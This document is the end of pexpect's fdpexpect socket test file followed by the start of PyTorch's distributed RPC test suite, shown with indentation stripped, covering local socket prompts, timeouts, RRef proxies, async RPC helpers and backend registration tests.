sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.host, self.port))
sock.listen(5)
server_up.set()
while True:
(conn, addr) = sock.accept()
conn.send(self.motd)
conn.send(self.prompt1)
result = conn.recv(1024)
if result != self.enter:
break
conn.send(self.prompt2)
result = conn.recv(1024)
if result != self.enter:
break
conn.send(self.prompt3)
result = conn.recv(1024)
if result.startswith(self.exit[0]):
conn.shutdown(socket.SHUT_RDWR)
conn.close()
except KeyboardInterrupt:
pass
if sock is not None:
try:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except socket.error:
pass
exit(0)
def socket_fn(self, timed_out, all_read):
result = 0
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock, timeout=10)
# Get all data from server
session.read_nonblocking(size=4096)
all_read.set()
# This read should timeout
session.read_nonblocking(size=4096)
except pexpect.TIMEOUT:
timed_out.set()
result = errno.ETIMEDOUT
exit(result)
def test_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
session.expect(self.prompt1)
self.assertEqual(session.before, self.motd)
session.send(self.enter)
session.expect(self.prompt2)
session.send(self.enter)
session.expect(self.prompt3)
session.send(self.exit)
session.expect(pexpect.EOF)
self.assertEqual(session.before, b'')
def test_socket_with_write(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
session.expect(self.prompt1)
self.assertEqual(session.before, self.motd)
session.write(self.enter)
session.expect(self.prompt2)
session.write(self.enter)
session.expect(self.prompt3)
session.write(self.exit)
session.expect(pexpect.EOF)
self.assertEqual(session.before, b'')
def test_not_int(self):
with self.assertRaises(pexpect.ExceptionPexpect):
session = fdpexpect.fdspawn('bogus', timeout=10)
def test_not_file_descriptor(self):
with self.assertRaises(pexpect.ExceptionPexpect):
session = fdpexpect.fdspawn(-1, timeout=10)
def test_timeout(self):
with self.assertRaises(pexpect.TIMEOUT):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock, timeout=10)
session.expect(b'Bogus response')
def test_interrupt(self):
timed_out = multiprocessing.Event()
all_read = multiprocessing.Event()
test_proc = multiprocessing.Process(target=self.socket_fn, args=(timed_out, all_read))
test_proc.daemon = True
test_proc.start()
while not all_read.is_set():
time.sleep(1.0)
os.kill(test_proc.pid, signal.SIGWINCH)
while not timed_out.is_set():
time.sleep(1.0)
test_proc.join(timeout=5.0)
self.assertEqual(test_proc.exitcode, errno.ETIMEDOUT)
def test_multiple_interrupts(self):
timed_out = multiprocessing.Event()
all_read = multiprocessing.Event()
test_proc = multiprocessing.Process(target=self.socket_fn, args=(timed_out, all_read))
test_proc.daemon = True
test_proc.start()
while not all_read.is_set():
time.sleep(1.0)
while not timed_out.is_set():
os.kill(test_proc.pid, signal.SIGWINCH)
time.sleep(1.0)
test_proc.join(timeout=5.0)
self.assertEqual(test_proc.exitcode, errno.ETIMEDOUT)
def test_maxread(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
session.maxread = 1100
session.expect(self.prompt1)
self.assertEqual(session.before, self.motd)
session.send(self.enter)
session.expect(self.prompt2)
session.send(self.enter)
session.expect(self.prompt3)
session.send(self.exit)
session.expect(pexpect.EOF)
self.assertEqual(session.before, b'')
def test_fd_isalive(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
assert session.isalive()
sock.close()
assert not session.isalive(), "Should not be alive after close()"
def test_fd_isalive_poll(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10, use_poll=True)
assert session.isalive()
sock.close()
assert not session.isalive(), "Should not be alive after close()"
def test_fd_isatty(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
assert not session.isatty()
session.close()
def test_fd_isatty_poll(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10, use_poll=True)
assert not session.isatty()
session.close()
def test_fileobj(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock, timeout=10) # Should get the fileno from the socket
session.expect(self.prompt1)
session.close()
assert not session.isalive()
session.close() # Smoketest - should be able to call this again
if __name__ == '__main__':
unittest.main()
suite = unittest.makeSuite(ExpectTestCase, 'test')
|
rpc_test.py
|
import concurrent.futures
import contextlib
import json
import logging
import os
import sys
import threading
import time
import unittest
import warnings
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import IS_MACOS, load_tests
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
single_threaded_process_group_agent,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
return self.tensor.sum()
# Copied from test/test_cuda.py.
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1 + 3)
def _test_self_remote_rref_as_rpc_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, torch.ones(2, 2) + 1))
self.assertEqual(ret, torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2) + 1)
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2))
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_rpc_arg(dst)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._test_self_remote_rref_as_rpc_arg(rpc.get_worker_info())
def _test_self_remote_rref_as_remote_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
self.assertEqual(
ret_rref.to_here(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2)
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_remote_arg(dst)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._test_self_remote_rref_as_remote_arg(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def test_world_size_one(self):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
expect = torch.ones(2, 2) * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(torch.ones(2, 2), torch.ones(2, 2))
)
self.assertEqual(expect, result)
expect = torch.ones(3, 3) * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(torch.ones(3, 3), torch.ones(3, 3))
).wait()
self.assertEqual(expect, result)
expect = torch.ones(4, 4) * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(torch.ones(4, 4), torch.ones(4, 4))
).to_here()
self.assertEqual(expect, result)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
workder_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
workder_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
